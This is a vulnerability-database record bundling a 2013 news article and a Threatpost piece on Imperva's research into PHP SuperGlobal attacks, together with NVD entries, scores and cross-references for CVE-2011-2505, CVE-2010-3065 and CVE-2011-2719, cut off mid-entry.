Web Application Security : PHP SuperGlobal Variables are vulnerable to Hackers

2013-09-09T06:45:00

Description

[![](http://3.bp.blogspot.com/-bTNLqCBVA9M/Ui4I09g_PoI/AAAAAAAAXiI/XNMdet2ry9Y/s1600/Thanks+to+PHP+flaw,+80%25+websites+in+the+world+are+vulnerable+to+Hackers.png)](<http://3.bp.blogspot.com/-bTNLqCBVA9M/Ui4I09g_PoI/AAAAAAAAXiI/XNMdet2ry9Y/s1600/Thanks+to+PHP+flaw,+80%25+websites+in+the+world+are+vulnerable+to+Hackers.png>) Hackers are focusing on vulnerabilities in the PHP web application development platform threatening 80% websites in the world, including many big website i.e. Facebook and Wikipedia. PHP has several predefined variables that are called SuperGlobals i.e. POST, GET, COOKIES, FILES etc. Imperva Releases Hacker Intelligence Initiative [Report](<http://www.imperva.com/download.asp?id=421>), particularly concerned about two vulnerabilities that can be used to execute code on servers running PHP and fail to stop **PHP SuperGlobal** parameter variables being modified by external sources. * Dubbed as **CVE-2011-2505**, describes a vulnerability in the authentication feature in PhpMyAdmin (PMA) that enables attackers to modify the **_SESSION** SuperGlobal variable. * **CVE-2010-3065** describes a problem in the PHP’s session serialization mechanism. By injecting malicious value into an internal variable using PHP's Superglobal mechanism, the attacker is able to change the application flow and execute arbitrary commands to take control over the server. “_Because compromised hosts can be used as botnet slaves to attack other servers, exploits against PHP applications can affect the general security and health of the entire web_,” Vulnerability is particularly dangerous due to the common use of PHP and could be used by hackers for a variety of purposes. "_The effects of these attacks can be great, as the PHP platform is by far the most popular Web application development platform, powering more than 80% of all Web sites, including Facebook and Wikipedia. Clearly, it is time for the security community to devote more attention to this issue._" They note that PHP applications do not protect against the modification of variables from external sources, such as query parameters or cookies. [![](http://3.bp.blogspot.com/-oXZsVrTbU9k/Ui6nzeazkuI/AAAAAAAAXiY/Q0bMUL4anns/s1600/php+attack.png)](<http://3.bp.blogspot.com/-oXZsVrTbU9k/Ui6nzeazkuI/AAAAAAAAXiY/Q0bMUL4anns/s1600/php+attack.png>) The attacker can combine the two separate vulnerabilities to extend the scope of the flaws. “_Based on the captured malicious traffic, we were able to trace its origin and find the specific exploit code used to generate it in a hacker forum on the web._” Imperva's research team noted an average of 144 attacks per application that contained attack vectors related to SuperGlobal parameters, for the purpose of remote code execution, remote file inclusion and security filter evasion attacks.

{"id": "THN:4D010FAF46F8DECDF22AE08BD5AA6962", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Web Application Security : PHP SuperGlobal Variables are vulnerable to Hackers", "description": "[![](http://3.bp.blogspot.com/-bTNLqCBVA9M/Ui4I09g_PoI/AAAAAAAAXiI/XNMdet2ry9Y/s1600/Thanks+to+PHP+flaw,+80%25+websites+in+the+world+are+vulnerable+to+Hackers.png)](<http://3.bp.blogspot.com/-bTNLqCBVA9M/Ui4I09g_PoI/AAAAAAAAXiI/XNMdet2ry9Y/s1600/Thanks+to+PHP+flaw,+80%25+websites+in+the+world+are+vulnerable+to+Hackers.png>)\n\nHackers are focusing on vulnerabilities in the PHP web application development platform threatening 80% websites in the world, including many big website i.e. Facebook and Wikipedia. PHP has several predefined variables that are called SuperGlobals i.e. POST, GET, COOKIES, FILES etc.\n\n \n\n\nImperva Releases Hacker Intelligence Initiative [Report](<http://www.imperva.com/download.asp?id=421>), particularly concerned about two vulnerabilities that can be used to execute code on servers running PHP and fail to stop **PHP SuperGlobal** parameter variables being modified by external sources. \n\n\n * Dubbed as **CVE-2011-2505**, describes a vulnerability in the authentication feature in PhpMyAdmin (PMA) that enables attackers to modify the **_SESSION** SuperGlobal variable.\n * **CVE-2010-3065** describes a problem in the PHP\u2019s session serialization mechanism. By injecting malicious value into an internal variable using PHP's Superglobal mechanism, the attacker is able to change the application flow and execute arbitrary commands to take control over the server.\n\n\u201c_Because compromised hosts can be used as botnet slaves to attack other servers, exploits against PHP applications can affect the general security and health of the entire web_,\u201d\n\n \n\n\nVulnerability is particularly dangerous due to the common use of PHP and could be used by hackers for a variety of purposes. \"_The effects of these attacks can be great, as the PHP platform is by far the most popular Web application development platform, powering more than 80% of all Web sites, including Facebook and Wikipedia. Clearly, it is time for the security community to devote more attention to this issue._\"\n\n \n\n\nThey note that PHP applications do not protect against the modification of variables from external sources, such as query parameters or cookies.\n\n[![](http://3.bp.blogspot.com/-oXZsVrTbU9k/Ui6nzeazkuI/AAAAAAAAXiY/Q0bMUL4anns/s1600/php+attack.png)](<http://3.bp.blogspot.com/-oXZsVrTbU9k/Ui6nzeazkuI/AAAAAAAAXiY/Q0bMUL4anns/s1600/php+attack.png>)\n\nThe attacker can combine the two separate vulnerabilities to extend the scope of the flaws. \u201c_Based on the captured malicious traffic, we were able to trace its origin and find the specific exploit code used to generate it in a hacker forum on the web._\u201d\n\n \n\n\nImperva's research team noted an average of 144 attacks per application that contained attack vectors related to SuperGlobal parameters, for the purpose of remote code execution, remote file inclusion and security filter evasion attacks.\n", "published": "2013-09-09T06:45:00", "modified": "2013-09-10T05:09:44", "epss": [{"cve": "CVE-2010-3065", "epss": 0.00471, "percentile": 0.72851, "modified": "2023-11-13"}, {"cve": "CVE-2011-2505", "epss": 0.18568, "percentile": 0.95695, "modified": "2023-11-13"}], "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/", "score": 6.4}, "cvss2": {}, "cvss3": {}, "href": "http://thehackernews.com/2013/09/thanks-to-php-superglobal-80-websites.html", "reporter": "Mohit Kumar", "references": [], "cvelist": ["CVE-2010-3065", "CVE-2011-2505"], "immutableFields": [], "lastseen": "2017-01-08T18:01:16", "viewCount": 144, "enchantments": {"score": {"value": 2.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "centos", "idList": ["CESA-2010:0919"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-2986", "CPAI-2013-2987", "CPAI-2014-1799"]}, {"type": "cve", "idList": ["CVE-2010-3065", "CVE-2011-2505", "CVE-2011-2719"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2286-1:4CCEC"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2011-2505", "DEBIANCVE:CVE-2011-2719"]}, {"type": "dsquare", "idList": ["E-15"]}, {"type": "exploitdb", "idList": ["EDB-ID:17510", "EDB-ID:17514"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4274B90AFFC9170C6C5F19A5B572681A", "EXPLOITPACK:951813AECD0336F4B9E6C4A40606C23E"]}, {"type": "freebsd", "idList": ["7E4E5C53-A56C-11E0-B180-00216AA06FC2"]}, {"type": "gentoo", "idList": ["GLSA-201110-06", "GLSA-201201-01"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2010-0919.NASL", "DEBIAN_DSA-2089.NASL", "DEBIAN_DSA-2286.NASL", "FEDORA_2011-9144.NASL", "FREEBSD_PKG_7E4E5C53A56C11E0B18000216AA06FC2.NASL", "GENTOO_GLSA-201110-06.NASL", "GENTOO_GLSA-201201-01.NASL", "ORACLELINUX_ELSA-2010-0919.NASL", "PHPMYADMIN_PMASA_2011_8.NASL", "PHP_5_2_14.NASL", "PHP_5_3_3.NASL", "REDHAT-RHSA-2010-0919.NASL", "SL_20101129_PHP_ON_SL4_X.NASL", "SUSE_11_1_APACHE2-MOD_PHP5-100928.NASL", "SUSE_11_2_APACHE2-MOD_PHP5-100813.NASL", "SUSE_11_3_APACHE2-MOD_PHP5-100812.NASL", "SUSE_11_APACHE2-MOD_PHP5-100805.NASL", "SUSE_APACHE2-MOD_PHP5-7110.NASL", "UBUNTU_USN-989-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103188", "OPENVAS:1361412562310110171", "OPENVAS:1361412562310110182", "OPENVAS:1361412562310122295", "OPENVAS:136141256231069995", "OPENVAS:136141256231070769", "OPENVAS:136141256231070802", "OPENVAS:1361412562310831441", "OPENVAS:1361412562310840501", "OPENVAS:1361412562310863362", "OPENVAS:1361412562310870362", "OPENVAS:1361412562310880456", "OPENVAS:1361412562310880633", "OPENVAS:69995", "OPENVAS:70769", "OPENVAS:70802", "OPENVAS:831441", "OPENVAS:840501", "OPENVAS:863362", "OPENVAS:870362", "OPENVAS:880456", "OPENVAS:880633"]}, {"type": "oraclelinux", "idList": ["ELSA-2010-0919"]}, {"type": "osv", "idList": ["OSV:DSA-2089-1", "OSV:DSA-2286-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102908", "PACKETSTORM:102940", "PACKETSTORM:102941"]}, {"type": "phpmyadmin", "idList": ["PHPMYADMIN:PMASA-2011-5"]}, {"type": "redhat", "idList": ["RHSA-2010:0919"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:24800", "SECURITYVULNS:DOC:26645", "SECURITYVULNS:DOC:26749", "SECURITYVULNS:DOC:27147", "SECURITYVULNS:VULN:11165", "SECURITYVULNS:VULN:11785"]}, {"type": "seebug", "idList": ["SSV:20704", "SSV:20710", "SSV:20711", "SSV:20714", "SSV:26109"]}, {"type": "thn", "idList": ["THN:570BC20A68A3569A403256D8040A03BB"]}, {"type": "threatpost", "idList": ["THREATPOST:A04B08327D4E7C2B97F353216BAFA013"]}, {"type": "ubuntu", "idList": ["USN-989-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2010-3065", "UB:CVE-2011-2505", "UB:CVE-2011-2719"]}, {"type": "veracode", "idList": ["VERACODE:24428"]}]}, "backreferences": {"references": [{"type": "centos", "idList": ["CESA-2010:0919"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-2986", "CPAI-2014-1799"]}, {"type": "cve", "idList": ["CVE-2010-3065"]}, {"type": "dsquare", "idList": ["E-15"]}, {"type": "exploitdb", "idList": ["EDB-ID:17510"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:951813AECD0336F4B9E6C4A40606C23E"]}, {"type": "freebsd", "idList": ["7E4E5C53-A56C-11E0-B180-00216AA06FC2"]}, {"type": "gentoo", "idList": ["GLSA-201201-01"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/SUSE-CVE-2019-8666/"]}, {"type": "nessus", "idList": ["SUSE_11_1_APACHE2-MOD_PHP5-100928.NASL", "SUSE_APACHE2-MOD_PHP5-7110.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:69995", "OPENVAS:863362"]}, {"type": "oraclelinux", "idList": ["ELSA-2010-0919"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102940"]}, {"type": "phpmyadmin", "idList": ["PHPMYADMIN:PMASA-2011-5"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11165"]}, {"type": "seebug", "idList": ["SSV:20704"]}, {"type": "threatpost", "idList": ["THREATPOST:A04B08327D4E7C2B97F353216BAFA013"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2010-3065"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2010-3065", "epss": "0.004710000", "percentile": "0.718200000", "modified": "2023-03-14"}, {"cve": "CVE-2011-2505", "epss": "0.418950000", "percentile": "0.966930000", "modified": "2023-03-14"}], "vulnersScore": 2.2}, "_state": {"dependencies": 1699909029, "score": 1699909626, "epss": 0}, "_internal": {"score_hash": "210c3fbefbec4ab24f8d58db976a2c7e"}}

{"thn": [{"lastseen": "2023-05-11T00:22:28", "description": "[![The Hacker News](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/images/-bTNLqCBVA9M/Ui4I09g_PoI/AAAAAAAAXiI/XNMdet2ry9Y/s728-e365/Thanks+to+PHP+flaw,+80%25+websites+in+the+world+are+vulnerable+to+Hackers.png>)\n\nHackers are focusing on vulnerabilities in the PHP web application development platform threatening 80% websites in the world, including many big website i.e. Facebook and Wikipedia. PHP has several predefined variables that are called SuperGlobals i.e. POST, GET, COOKIES, FILES etc.\n\n \n\n\nImperva Releases Hacker Intelligence Initiative [Report](<https://www.imperva.com/download.asp?id=421>), particularly concerned about two vulnerabilities that can be used to execute code on servers running PHP and fail to stop **PHP SuperGlobal** parameter variables being modified by external sources. \n\n\n * Dubbed as **CVE-2011-2505**, describes a vulnerability in the authentication feature in PhpMyAdmin (PMA) that enables attackers to modify the **_SESSION** SuperGlobal variable.\n * **CVE-2010-3065** describes a problem in the PHP's session serialization mechanism. By injecting malicious value into an internal variable using PHP's Superglobal mechanism, the attacker is able to change the application flow and execute arbitrary commands to take control over the server.\n\n\"_Because compromised hosts can be used as botnet slaves to attack other servers, exploits against PHP applications can affect the general security and health of the entire web_,\"\n\n \n\n\nVulnerability is particularly dangerous due to the common use of PHP and could be used by hackers for a variety of purposes. \"_The effects of these attacks can be great, as the PHP platform is by far the most popular Web application development platform, powering more than 80% of all Web sites, including Facebook and Wikipedia. Clearly, it is time for the security community to devote more attention to this issue._\"\n\n \n\n\nThey note that PHP applications do not protect against the modification of variables from external sources, such as query parameters or cookies.\n\n[![The Hacker News](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/images/-oXZsVrTbU9k/Ui6nzeazkuI/AAAAAAAAXiY/Q0bMUL4anns/s728-e365/php+attack.png>)\n\nThe attacker can combine the two separate vulnerabilities to extend the scope of the flaws. \"_Based on the captured malicious traffic, we were able to trace its origin and find the specific exploit code used to generate it in a hacker forum on the web._\"\n\n \n\n\nImperva's research team noted an average of 144 attacks per application that contained attack vectors related to SuperGlobal parameters, for the purpose of remote code execution, remote file inclusion and security filter evasion attacks.\n", "cvss3": {}, "published": "2013-09-09T17:45:00", "type": "thn", "title": "Web Application Security : PHP SuperGlobal Variables are vulnerable to Hackers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3065", "CVE-2011-2505"], "modified": "2013-09-10T05:09:44", "id": "THN:570BC20A68A3569A403256D8040A03BB", "href": "https://thehackernews.com/2013/09/thanks-to-php-superglobal-80-websites.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T23:00:13", "description": "The ease with which PHP applications can be subverted should be pretty apparent by now given the number of [botnets supported by compromised sites hosting PHP code](<http://threatpost.com/fort-disco-brute-force-attack-campaign-targets-cms-websites>).\n\nThe biggest culprit in the PHP universe may be a set of nine variables called SuperGlobals that provide programmers with development flexibility yet introduce dangerous vulnerabilities that allow attackers to externally modify these variables and run code of their choosing, conduct remote file inclusion, or bypass intrusion detection signatures.\n\nResearch released today by Imperva [calls for a ban on SuperGlobal variables](<http://www.imperva.com/download.asp?id=421>), vulnerabilities which can be exploited to break application logic and hack servers hosting the wonky code. The result could be anything from fraud against online banking customers to loss of personal data.\n\n\u201cBecause compromised hosts can be used as botnet slaves to attack other servers, exploits against PHP applications can affect the general security and health of the entire Web,\u201d said Amichai Shulman, CTO at Imperva.\n\nImperva\u2019s research points out that 81 percent of websites host some PHP code, compared to, for example, ASP.NET which is found on 19 percent of sites, and Java on 3 percent. PHP SuperGlobal variables, meanwhile, are problematic because they can allow an outsider to remotely override internal variables with external input, Imperva said.\n\nImperva monitored two particular vulnerabilities: CVE-2011-2505, which is a flaw in the authentication feature of PhPMyAdmin (PMA) that enables hackers to modify the _SESSION SuperGlobal variable; and CVE-2010-3065, which enables the injection of arbitrary code strings into a serialized session.\n\nThe Imperva report said hackers can combine the two vulnerabilities and execute code on a server running PMA. A configuration object running in PMA would need to load two functions in order ro execute an injected configuration file.\n\n\u201cThe attacker can combine the two separate vulnerabilities, the former letting the attacker inject a value into the session, and the latter allowing the attacker to create arbitrary string to inject a maliciously crafted PMA_config object into the serialized session,\u201d the report said.\n\nIn May, researchers monitored attacks against PHP applications, the data collected via honeypots and from customer data. More than 3,000 requests were observed that manipulated SuperGlobal variables; those requests came from 27 source IP addresses against 24 Web applications; 55 percent of the attacks seen were against SuperGlobal parameters.\n\nThese vulnerabilities, Imperva said, are known to the security industry and popular scanners such as Nessus and Nikto already scan for them. But developers continue to use them in PHP applications. Attacks, however, have legs. One particular campaign observed by Imperva lasted five months and IP addresses from six countries were targeting sites in a number of critical industries, including financial services. Exploit code, meanwhile, was found on a popular Russian hacker forum.\n\n\u201cInterestingly, some of the attacking IP addresses targeted two to three applications simultaneously. The requests were probably generated by the same tool, as they contained distinct characteristics such as an identical, rarely user-agent string,\u201d the report said.\n\nAttackers are also intent on giving these PHP attacks some longevity by injecting behaviors that help them elude being detected by security software. The _REQUEST SuperGlobal variable is being abused in these instances, Imperva said. This particular variable works because, rather than expose a vulnerable portion of code, it functionally changes the parameters\u2019 names which can enable it to bypass an existing IDS signature, for example.\n\nThese attacks illustrate the need to keep PHP code up to date, in particular on third-party applications, because they\u2019re easily being exploited.\n\n\u201cAttackers are able to capture this complex attack scenario in a single script that can be used by a botnet operator without exceptional skills,\u201d the report said. \u201cThe script can be automatically distributed to compromised servers and executed autonomously to gain control or further servers.\u201d\n", "cvss3": {}, "published": "2013-09-09T14:54:04", "type": "threatpost", "title": "Call for Ban on Vulnerable PHP SuperGlobal Variables", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3065", "CVE-2011-2505"], "modified": "2013-09-11T12:44:35", "id": "THREATPOST:A04B08327D4E7C2B97F353216BAFA013", "href": "https://threatpost.com/researchers-call-for-ban-on-php-superglobal-variables/102224/", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2023-12-02T15:07:50", "description": "libraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication feature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 assigns values to arbitrary parameters referenced in the query string, which allows remote attackers to modify the SESSION superglobal array via a crafted request, related to a \"remote variable manipulation vulnerability.\"", "cvss3": {}, "published": "2011-07-14T23:55:00", "type": "cve", "title": "CVE-2011-2505", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505"], "modified": "2023-11-07T02:07:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:3.2.2", "cpe:/a:phpmyadmin:phpmyadmin:3.4.2.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.5", "cpe:/a:phpmyadmin:phpmyadmin:3.3.9.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.5.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.3.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.9.2", "cpe:/a:phpmyadmin:phpmyadmin:3.4.0.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.10.1", "cpe:/a:phpmyadmin:phpmyadmin:3.2.1", "cpe:/a:phpmyadmin:phpmyadmin:3.1.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.8", "cpe:/a:phpmyadmin:phpmyadmin:3.0.0", "cpe:/a:phpmyadmin:phpmyadmin:3.0.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.0.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.8.1", "cpe:/a:phpmyadmin:phpmyadmin:3.4.3.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.3", "cpe:/a:phpmyadmin:phpmyadmin:3.3.2.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.4.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.5.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.3.0", "cpe:/a:phpmyadmin:phpmyadmin:3.0.1.1", "cpe:/a:phpmyadmin:phpmyadmin:3.1.3.2", "cpe:/a:phpmyadmin:phpmyadmin:3.3.9.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.10.0", "cpe:/a:phpmyadmin:phpmyadmin:3.4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.4", "cpe:/a:phpmyadmin:phpmyadmin:3.1.2", "cpe:/a:phpmyadmin:phpmyadmin:3.3.1.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.6", "cpe:/a:phpmyadmin:phpmyadmin:3.2.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.7"], "id": "CVE-2011-2505", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2505", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-02T14:24:48", "description": "The default session serializer in PHP 5.2 through 5.2.13 and 5.3 through 5.3.2 does not properly handle the PS_UNDEF_MARKER marker, which allows context-dependent attackers to modify arbitrary session variables via a crafted session variable name.", "cvss3": {}, "published": "2010-08-20T20:00:00", "type": "cve", "title": "CVE-2010-3065", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3065"], "modified": "2010-12-10T06:44:00", "cpe": ["cpe:/a:php:php:5.2.5", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:5.3.1", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:5.2.12", "cpe:/a:php:php:5.2.13", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.3.2", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:5.2.1"], "id": "CVE-2010-3065", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3065", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-02T15:08:56", "description": "libraries/auth/swekey/swekey.auth.lib.php in phpMyAdmin 3.x before 3.3.10.3 and 3.4.x before 3.4.3.2 does not properly manage sessions associated with Swekey authentication, which allows remote attackers to modify the SESSION superglobal array, other superglobal arrays, and certain swekey.auth.lib.php local variables via a crafted query string, a related issue to CVE-2011-2505.", "cvss3": {}, "published": "2011-08-01T19:55:00", "type": "cve", "title": "CVE-2011-2719", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 